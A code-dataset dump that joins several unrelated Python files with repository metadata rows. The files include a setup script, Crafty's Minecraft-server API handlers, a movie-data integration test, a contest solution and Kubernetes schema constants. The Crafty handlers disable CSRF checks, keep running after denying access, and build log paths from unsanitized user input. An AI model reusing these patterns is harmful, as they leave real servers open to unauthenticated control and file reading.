    Y_train = Y[train_indices]
    X_test = X[test_indices]
    Y_test = Y[test_indices]

    print "Compressing & saving training & testing sets."
    test_set_output_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        'preprocessed_data_sets',
        'test.npz')
    train_set_output_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        'preprocessed_data_sets',
        'train.npz')
    np.savez_compressed(test_set_output_path, X=X_test, Y=Y_test)
    np.savez_compressed(train_set_output_path, X=X_train, Y=Y_train)


if __name__ == "__main__":
    import sys
preprocess(float(sys.argv[1])) | 30.484848 | 100 | 0.708748 | 298 | 2,012 | 4.540268 | 0.369128 | 0.059128 | 0.038433 | 0.025129 | 0.172949 | 0.109387 | 0.109387 | 0.109387 | 0.109387 | 0.109387 | 0 | 0.012643 | 0.174453 | 2,012 | 66 | 101 | 30.484848 | 0.801927 | 0.099404 | 0 | 0.086957 | 0 | 0 | 0.131012 | 0.024323 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.108696 | null | null | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
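The training and testing splits saved above with `np.savez_compressed` can be read back with `np.load`, which returns a lazy archive keyed by the keyword names passed to `savez`. A minimal round-trip sketch (the tiny arrays and temp path are illustrative, not the real data set):

```python
import os
import tempfile
import numpy as np

# Tiny stand-in for the preprocessed data: 4 "matches", 6 "features".
X = np.arange(24, dtype=np.int32).reshape(4, 6)
Y = np.array([1, 0, 1, 0], dtype=np.int32)

path = os.path.join(tempfile.mkdtemp(), "train.npz")
np.savez_compressed(path, X=X, Y=Y)

# np.load on an .npz yields an archive; arrays are materialized on key access.
with np.load(path) as data:
    X_loaded, Y_loaded = data["X"], data["Y"]

assert (X_loaded == X).all() and (Y_loaded == Y).all()
```

Keys in the archive match the `X=` / `Y=` keyword names used when saving, so a consumer script only needs to agree on those names.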
1ec070b4dfe048a4d96d7330f5ff96b4e65d4d4c | 596 | py | Python | setup.py | cxwx/naima | d8aa926fe757c4fd67583b6c341c3496a58b3e70 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cxwx/naima | d8aa926fe757c4fd67583b6c341c3496a58b3e70 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cxwx/naima | d8aa926fe757c4fd67583b6c341c3496a58b3e70 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from setuptools import setup, find_packages
setup(
use_scm_version={
"version_scheme": "post-release",
"local_scheme": "dirty-tag",
},
setup_requires=["setuptools_scm"],
packages=find_packages("src"),
package_dir={"": "src"},
package_data={"naima": ["data/*.npz"]},
install_requires=[
"astropy>=1.0.2",
"emcee>=3.0.2",
"corner",
"matplotlib",
"scipy",
"h5py",
"pyyaml",
],
python_requires=">=3.9",
)
| 22.923077 | 63 | 0.568792 | 68 | 596 | 4.808824 | 0.705882 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022523 | 0.255034 | 596 | 25 | 64 | 23.84 | 0.713964 | 0.137584 | 0 | 0 | 0 | 0 | 0.28125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.047619 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ec32394dcecf728ff23af953f1ad48fb5e5de37 | 13,597 | py | Python | app/classes/api.py | MikeMart77/crafty | 686f5d4a210f7ff4b91e0427e6ebc5e2a5dcbeb7 | [
"Apache-2.0"
] | 37 | 2020-07-11T02:41:31.000Z | 2022-01-03T19:33:49.000Z | app/classes/api.py | MikeMart77/crafty | 686f5d4a210f7ff4b91e0427e6ebc5e2a5dcbeb7 | [
"Apache-2.0"
] | 21 | 2020-07-11T12:08:12.000Z | 2021-09-23T10:55:09.000Z | app/classes/api.py | MikeMart77/crafty | 686f5d4a210f7ff4b91e0427e6ebc5e2a5dcbeb7 | [
"Apache-2.0"
] | 18 | 2020-07-11T11:36:30.000Z | 2022-01-14T07:11:37.000Z | import os
import secrets
import threading
import tornado.web
import tornado.escape
import logging.config
from app.classes.models import Roles, Users, check_role_permission, Remote, model_to_dict
from app.classes.multiserv import multi
from app.classes.helpers import helper
from app.classes.backupmgr import backupmgr
logger = logging.getLogger(__name__)
class BaseHandler(tornado.web.RequestHandler):
def check_xsrf_cookie(self):
# Disable CSRF protection on API routes
pass
def return_response(self, status, errors, data, messages):
# Define a standardized response
self.write({
"status": status,
"data": data,
"errors": errors,
"messages": messages
})
def access_denied(self, user):
logger.info("User %s was denied access to API route", user)
self.set_status(403)
self.finish(self.return_response(403, {'error':'ACCESS_DENIED'}, {}, {'info':'You were denied access to the requested resource'}))
def authenticate_user(self, token):
try:
logger.debug("Searching for specified token")
user_data = Users.get(api_token=token)
logger.debug("Checking results")
if user_data:
# Login successful! Return the username
logger.info("User {} has authenticated to API".format(user_data.username))
return user_data.username
else:
logger.debug("Auth unsuccessful")
return None
except Exception:
logger.warning("Traceback occurred when authenticating user to API. Most likely wrong token")
return None
class SendCommand(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
command = self.get_body_argument('command', default=None, strip=True)
server_id = self.get_argument('id')
if command:
server = multi.get_server_obj(server_id)
if server.check_running():
server.send_command(command)
self.return_response(200, '', {"run": True}, '')
else:
self.return_response(200, {'error':'SER_NOT_RUNNING'}, {}, {})
else:
self.return_response(200, {'error':'NO_COMMAND'}, {}, {})
class GetHostStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_host_status()
stats.pop('time')  # We don't need the request time
self.return_response(200, {}, stats, {})
class GetServerStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_stats_for_servers()
data = []
for server in stats:
server = stats[server]
server.pop('time')  # We don't need the request time
data.append(server)
self.return_response(200, {}, data, {})
class SearchMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
search_string = self.get_argument('query', default=None, strip=True)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, search_string)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetCraftyLogs(BaseHandler):
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class SearchCraftyLogs(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
query = self.get_argument('query')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, query)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class ForceServerBackup(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'backups'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
backup_thread = threading.Thread(name='backup', target=server.backup_server, daemon=False)
backup_thread.start()
self.return_response(200, {}, {'code':'SER_BAK_CALLED'}, {})
class StartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if not server.check_running():
Remote.insert({
Remote.command: 'start_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_START_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_RUNNING'}, {}, {})
class StopServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if server.check_running():
Remote.insert({
Remote.command: 'stop_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_STOP_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_NOT_RUNNING'}, {}, {})
class RestartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
server.restart_threaded_server()
self.return_response(200, {}, {'code':'SER_RESTART_CALLED'}, {})
class CreateUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
new_username = self.get_argument("username")
# TODO: implement role checking
#new_role = self.get_argument("role", 'Mod')
if new_username:
new_pass = helper.random_string_generator()
new_token = secrets.token_urlsafe(32)
result = Users.insert({
Users.username: new_username,
Users.role: 'Mod',
Users.password: helper.encode_pass(new_pass),
Users.api_token: new_token
}).execute()
self.return_response(200, {}, {'code':'COMPLETE', 'username': new_username, 'password': new_pass, 'api_token': new_token}, {})
else:
self.return_response(500, {'error':'MISSING_PARAMS'}, {}, {'info':'Some parameters failed validation'})
class DeleteUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
username = self.get_argument("username", None, True)
if username == 'Admin':
self.return_response(500, {'error':'NOT_ALLOWED'}, {}, {'info':'You cannot delete the admin user'})
else:
if username:
Users.delete().where(Users.username == username).execute()
self.return_response(200, {}, {'code':'COMPLETED'}, {})
class ListServers(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access'):
self.access_denied(user)
self.return_response(200, {}, {"code": "COMPLETED", "servers": multi.list_servers()}, {})
| 33.823383 | 138 | 0.572994 | 1,474 | 13,597 | 5.085482 | 0.141791 | 0.048026 | 0.070971 | 0.079242 | 0.693837 | 0.677695 | 0.643943 | 0.634872 | 0.616195 | 0.616195 | 0 | 0.008198 | 0.318232 | 13,597 | 402 | 139 | 33.823383 | 0.800432 | 0.017798 | 0 | 0.633452 | 0 | 0 | 0.094022 | 0 | 0 | 0 | 0 | 0.002488 | 0 | 1 | 0.099644 | false | 0.017794 | 0.035587 | 0 | 0.199288 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
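Every handler above gates access with the same pattern: deny only when the user lacks *both* `api_access` and the route-specific permission, so either one suffices. That logic can be factored into a plain helper; the sketch below uses a stubbed role table in place of the `Users`/`Roles` model query behind `check_role_permission` (role names and permission sets are hypothetical):

```python
# Hypothetical role table standing in for the check_role_permission DB lookup.
ROLE_PERMISSIONS = {
    "admin": {"api_access", "svr_control", "logs", "backups", "config"},
    "viewer": {"logs"},
}

def is_allowed(role, permission):
    """Mirror the handlers' gate: access is denied only when the user has
    neither api_access nor the route permission, i.e. either one grants it."""
    granted = ROLE_PERMISSIONS.get(role, set())
    return "api_access" in granted or permission in granted

assert is_allowed("admin", "backups")
assert is_allowed("viewer", "logs")      # route permission alone suffices
assert not is_allowed("viewer", "backups")
assert not is_allowed("unknown", "logs")
```

Note also that `access_denied` writes a 403 response but the handlers fall through and keep executing afterwards; a stricter version would `return` immediately after calling it.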
1ee2eaa1b69e4110f3a47a8efebc193125827f64 | 2,153 | py | Python | processes/tests/test_integration.py | kinoreel/kino-gather | defc0d6b311651f985467b5bfcfdbf77d73c10ae | [
"MIT"
] | null | null | null | processes/tests/test_integration.py | kinoreel/kino-gather | defc0d6b311651f985467b5bfcfdbf77d73c10ae | [
"MIT"
] | 3 | 2017-06-03T16:50:56.000Z | 2017-10-01T09:24:37.000Z | processes/tests/test_integration.py | kinoreel/kino-gather | defc0d6b311651f985467b5bfcfdbf77d73c10ae | [
"MIT"
] | null | null | null | import unittest
from processes.get_omdb import Main as get_omdb
from processes.get_tmdb import Main as get_tmdb
from processes.get_itunes import Main as get_itunes
from processes.get_amazon import Main as get_amazon
from processes.get_trailer import Main as get_trailer
from processes.get_youtube import Main as get_youtube
from processes.insert_errored import Main as insert_errored
from processes.insert_movies import Main as insert_movies
from processes.insert_movies2companies import Main as insert_movies2companies
from processes.insert_movies2genres import Main as insert_movies2genres
from processes.insert_movies2keywords import Main as insert_movies2keywords
from processes.insert_movies2numbers import Main as insert_movies2numbers
from processes.insert_movies2persons import Main as insert_movies2persons
from processes.insert_movies2ratings import Main as insert_movies2ratings
from processes.insert_movies2streams import Main as insert_movies2streams
from processes.insert_movies2trailers import Main as insert_movies2trailers
class IntegrationTest(unittest.TestCase):
def test(self):
imdb_id = "tt5451118"
payload = {'imdb_id': imdb_id}
response = get_omdb().run({'imdb_id': imdb_id})
payload.update(response)
response = get_tmdb().run(payload)
payload.update(response)
response = get_trailer().run(payload)
payload.update(response)
response = get_itunes().run(payload)
payload.update(response)
response = get_amazon().run(payload)
payload.update(response)
response = get_youtube().run(payload)
payload.update(response)
print(payload)
# insert_movies().run(payload)
# insert_movies2companies().run(payload)
# insert_movies2keywords().run(payload)
# insert_movies2numbers().run(payload)
# insert_movies2persons().run(payload)
# insert_movies2ratings().run(payload)
# insert_movies2genres().run(payload)
# insert_movies2streams().run(payload)
# insert_movies2trailers().run(payload)
| 43.938776 | 77 | 0.764515 | 259 | 2,153 | 6.146718 | 0.146718 | 0.138819 | 0.128141 | 0.124372 | 0.218593 | 0.17902 | 0.17902 | 0.073492 | 0.073492 | 0.073492 | 0 | 0.01728 | 0.166744 | 2,153 | 48 | 78 | 44.854167 | 0.870123 | 0.151881 | 0 | 0.228571 | 0 | 0 | 0.012665 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.514286 | 0 | 0.571429 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
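The integration test above threads one `payload` dict through a chain of fetch steps, each returning new fields that are merged in with `dict.update`. The accumulation pattern in isolation (the step functions and values below are stubs, not the real gather processes):

```python
# Hypothetical stub steps: each inspects the payload and returns fields to merge.
def step_ids(payload):
    return {"tmdb_id": 550}

def step_title(payload):
    return {"title": "Fight Club"}

payload = {"imdb_id": "tt0137523"}
for step in (step_ids, step_title):
    # Each step sees everything accumulated so far.
    payload.update(step(payload))

assert payload == {"imdb_id": "tt0137523", "tmdb_id": 550, "title": "Fight Club"}
```

Because every step receives the full payload, later steps can depend on fields produced by earlier ones, which is exactly how `get_tmdb` consumes the output of `get_omdb` above.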
1ee52fe1eea1eb33ec6b8f41d0abb79ccd50ea30 | 1,935 | py | Python | 2018/1A/robot_cashier.py | AmauryLiet/CodeJam | 3e02bce287e3c640d89eea4b0d5878319c79d59b | [
"MIT"
] | null | null | null | 2018/1A/robot_cashier.py | AmauryLiet/CodeJam | 3e02bce287e3c640d89eea4b0d5878319c79d59b | [
"MIT"
] | null | null | null | 2018/1A/robot_cashier.py | AmauryLiet/CodeJam | 3e02bce287e3c640d89eea4b0d5878319c79d59b | [
"MIT"
] | null | null | null | N = int(input())
MAX, VAR, FIX = range(3)
# latest=9 r=3 b=4
# max_variable_fixed_values = [
# 3 4 5
# 2 3 3
# 2 1 5
# 2 4 2
# 2 2 4
# 2 5 1
# ]
def try_to_beat(latest_score, r, b, max_var_fixed):
our_score = 0
while b > 0:
if not r:
return -1
best_c_max_b, best_max_b = 0, 0
for max_b, variable, fixed in max_var_fixed:
this_c_max = min(
max_b,
b,
(latest_score - fixed - 1)//variable
)
if this_c_max > best_max_b: # and this_c_max > 0
best_c_max_b, best_max_b = ([max_b, variable, fixed], this_c_max)
if not best_max_b:
return -1
max_var_fixed.remove(best_c_max_b)
b -= best_max_b
r -= 1
our_score = max(
our_score,
best_c_max_b[FIX] + best_max_b*best_c_max_b[VAR]
)
return our_score
def initial_total_time(b, max_var_fixed):
initial_best_time = 0
for max_b, variable, fixed in max_var_fixed:
passed_bits = min(b, max_b)
b -= passed_bits
initial_best_time = max(
initial_best_time,
fixed + variable*passed_bits
)
if not b:
return initial_best_time
for case_id in range(1, N + 1):
r, b, c = map(int, input().split())
max_variable_fixed_values = sorted([
[*map(int, input().split())]
for _ in range(c)
], key=lambda item: item[MAX], reverse=True)
total_time = initial_total_time(b, max_variable_fixed_values)
print(total_time)
while True:
new_attempt = try_to_beat(total_time, r, b, max_variable_fixed_values.copy())
print(new_attempt)
if new_attempt == -1:
break
else:
total_time = new_attempt
print('Case #{}: {}'.format(case_id, total_time))
| 24.1875 | 85 | 0.54522 | 288 | 1,935 | 3.319444 | 0.208333 | 0.066946 | 0.050209 | 0.047071 | 0.192469 | 0.106695 | 0.106695 | 0.07113 | 0.07113 | 0.07113 | 0 | 0.028226 | 0.359173 | 1,935 | 79 | 86 | 24.493671 | 0.742742 | 0.05323 | 0 | 0.075472 | 0 | 0 | 0.00659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037736 | false | 0.056604 | 0 | 0 | 0.113208 | 0.056604 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9493adf2b60df22181c7328199d9efdac249dd59 | 1,145 | py | Python | devito/data/meta.py | jrt54/devito | 5a63696db03ae77c0925fd4a96a531fd21308727 | [
"MIT"
] | 1 | 2020-09-17T02:53:06.000Z | 2020-09-17T02:53:06.000Z | devito/data/meta.py | jrt54/devito | 5a63696db03ae77c0925fd4a96a531fd21308727 | [
"MIT"
] | null | null | null | devito/data/meta.py | jrt54/devito | 5a63696db03ae77c0925fd4a96a531fd21308727 | [
"MIT"
] | null | null | null | from devito.tools import Tag
__all__ = ['DOMAIN', 'CORE', 'OWNED', 'HALO', 'NOPAD', 'FULL',
'LEFT', 'RIGHT', 'CENTER']
class DataRegion(Tag):
pass
CORE = DataRegion('core') # within DOMAIN
OWNED = DataRegion('owned') # within DOMAIN
DOMAIN = DataRegion('domain') # == CORE + OWNED
HALO = DataRegion('halo')
NOPAD = DataRegion('nopad') # == DOMAIN+HALO
FULL = DataRegion('full') # == DOMAIN+HALO+PADDING
class DataSide(Tag):
def __init__(self, name, val, flipto=None):
super(DataSide, self).__init__(name, val)
if flipto is not None:
self.flip = lambda: flipto
flipto.flip = lambda: self
else:
self.flip = lambda: self
def __lt__(self, other):
return self.val < other.val
def __le__(self, other):
return self.val <= other.val
def __gt__(self, other):
return self.val > other.val
def __ge__(self, other):
return self.val >= other.val
def __str__(self):
return self.name
__repr__ = __str__
LEFT = DataSide('left', -1)
CENTER = DataSide('center', 0)
RIGHT = DataSide('right', 1, LEFT)
| 22.9 | 62 | 0.603493 | 139 | 1,145 | 4.683453 | 0.323741 | 0.076805 | 0.092166 | 0.116743 | 0.202765 | 0.202765 | 0.202765 | 0.202765 | 0 | 0 | 0 | 0.003521 | 0.255895 | 1,145 | 49 | 63 | 23.367347 | 0.760563 | 0.070742 | 0 | 0 | 0 | 0 | 0.081285 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0.030303 | 0.030303 | 0.151515 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
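`DataSide` layers a total ordering and a `flip()` involution on top of devito's `Tag`. The same idea can be sketched without the devito dependency (the `Side` class below is a standalone stand-in, not devito's implementation):

```python
class Side:
    """Comparable side marker; LEFT and RIGHT flip to each other."""
    def __init__(self, name, val, flipto=None):
        self.name, self.val = name, val
        if flipto is not None:
            # Register each side as the other's flip, mirroring DataSide.
            self.flip = lambda: flipto
            flipto.flip = lambda: self
        else:
            self.flip = lambda: self

    def __lt__(self, other):
        return self.val < other.val

LEFT = Side("left", -1)
CENTER = Side("center", 0)
RIGHT = Side("right", 1, LEFT)

assert LEFT < CENTER < RIGHT
assert RIGHT.flip() is LEFT and LEFT.flip() is RIGHT
assert CENTER.flip() is CENTER   # center is its own flip
```

Storing `flip` as a closure over the partner object keeps the pairing symmetric without a lookup table.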
9495a56bdecb82a6a0d94d51b82b391d6b4dd77b | 36,691 | py | Python | bcs-ui/backend/templatesets/legacy_apps/configuration/k8s/constants.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 599 | 2019-06-25T03:20:46.000Z | 2022-03-31T12:14:33.000Z | bcs-ui/backend/templatesets/legacy_apps/configuration/k8s/constants.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 537 | 2019-06-27T06:03:44.000Z | 2022-03-31T12:10:01.000Z | bcs-ui/backend/templatesets/legacy_apps/configuration/k8s/constants.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 214 | 2019-06-25T03:26:05.000Z | 2022-03-31T07:52:03.000Z | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from backend.templatesets.legacy_apps.instance.funutils import update_nested_dict
from ..constants import FILE_DIR_PATTERN, KRESOURCE_NAMES, NUM_VAR_PATTERN
# Resource name
K8S_RES_NAME_PATTERN = "^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$"
# Mount volume name restriction
VOLUMR_NAME_PATTERN = "^[a-zA-Z{]{1}[a-zA-Z0-9-_{}]{0,254}$"
# TODO: handle validation when the value is a template variable
PORT_NAME_PATTERN = "^[a-zA-Z{]{1}[a-zA-Z0-9-{}_]{0,254}$"
# configmap/secret key name restriction
KEY_NAME_PATTERN = "^[.a-zA-Z{]{1}[a-zA-Z0-9-_.{}]{0,254}$"
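These patterns are anchored regexes; `K8S_RES_NAME_PATTERN` in particular enforces DNS-1123 subdomain style names (lowercase alphanumerics and dashes, dot-separated labels). A quick check with the standard `re` module, copying the pattern from above:

```python
import re

# Copied from K8S_RES_NAME_PATTERN above (raw string to avoid escape warnings).
K8S_RES_NAME_PATTERN = r"^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$"

def is_valid_name(name):
    """True if the name matches the anchored resource-name pattern."""
    return re.match(K8S_RES_NAME_PATTERN, name) is not None

assert is_valid_name("my-deployment")
assert is_valid_name("app.v2")
assert not is_valid_name("-bad")   # must not start with a dash
assert not is_valid_name("Bad")    # uppercase is rejected
```

The explicit `^`/`$` anchors matter here: JSON Schema's `pattern` keyword performs an unanchored search, so without them a partially valid name would pass.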
# Affinity validation
AFFINITY_MATCH_EXPRESSION_SCHEMA = {
"type": "array",
"items": {
"type": "object",
"required": ["key", "operator"],
"properties": {
"key": {"type": "string", "minLength": 1},
"operator": {"type": "string", "enum": ["In", "NotIn", "Exists", "DoesNotExist", "Gt", "Lt"]},
"values": {"type": "array", "items": {"type": "string", "minLength": 1}},
},
"additionalProperties": False,
},
}
POD_AFFINITY_TERM_SCHEMA = {
"type": "object",
"properties": {
"labelSelector": {"type": "object", "properties": {"matchExpressions": AFFINITY_MATCH_EXPRESSION_SCHEMA}},
"namespaces": {"type": "array", "items": {"type": "string"}},
"topologyKey": {"type": "string"},
},
"additionalProperties": False,
}
POD_AFFINITY_SCHEMA = {
"type": "object",
"properties": {
"requiredDuringSchedulingIgnoredDuringExecution": {"type": "array", "items": POD_AFFINITY_TERM_SCHEMA},
"preferredDuringSchedulingIgnoredDuringExecution": {
"type": "array",
"items": {
"type": "object",
"required": ["podAffinityTerm"],
"properties": {
"weight": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 100},
]
},
"podAffinityTerm": POD_AFFINITY_TERM_SCHEMA,
},
},
},
},
"additionalProperties": False,
}
# Liveness & readiness checks
K8S_CHECK_SCHEMA = {
"type": "object",
"required": ["initialDelaySeconds", "periodSeconds", "timeoutSeconds", "failureThreshold", "successThreshold"],
"properties": {
"initialDelaySeconds": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"periodSeconds": {"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]},
"timeoutSeconds": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]
},
"failureThreshold": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]
},
"successThreshold": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]
},
"exec": {"type": "object", "properties": {"command": {"type": "string"}}},
"tcpSocket": {"type": "object", "properties": {"port": {"oneOf": [{"type": "number"}, {"type": "string"}]}}},
"httpGet": {
"type": "object",
"properties": {
"port": {"oneOf": [{"type": "number"}, {"type": "string"}]},
"path": {"type": "string"},
"httpHeaders": {
"type": "array",
"items": {
"type": "object",
"properties": {"name": {"type": "string"}, "value": {"type": "string"}},
},
},
},
},
},
}
INIT_CONTAINER_SCHEMA = {
"type": "array",
"items": {
"type": "object",
"required": ["name", "image", "imagePullPolicy", "volumeMounts", "ports", "resources"],
"properties": {
"name": {"type": "string", "minLength": 1},
"image": {"type": "string", "minLength": 1},
"imagePullPolicy": {"type": "string", "enum": ["Always", "IfNotPresent", "Never"]},
"volumeMounts": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "mountPath", "readOnly"],
"properties": {
"name": {"type": "string", "pattern": VOLUMR_NAME_PATTERN},
"mountPath": {"type": "string", "pattern": FILE_DIR_PATTERN},
